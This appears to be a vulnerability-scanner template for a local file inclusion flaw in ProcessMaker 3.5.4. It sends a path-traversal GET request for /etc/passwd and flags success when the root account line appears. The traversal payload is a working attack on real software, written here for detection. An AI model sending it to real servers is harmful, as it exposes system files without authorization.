name:
  - "ProcessMaker 3.5.4 - Local File inclusion"
url:
  - "/../../../..//etc/passwd"
method:
  - "GET"
data:
  - ""
matchers:
  - Status:
      - 200
  - Regex:
      - "root:x:0:0:root:/root:/bin/bash"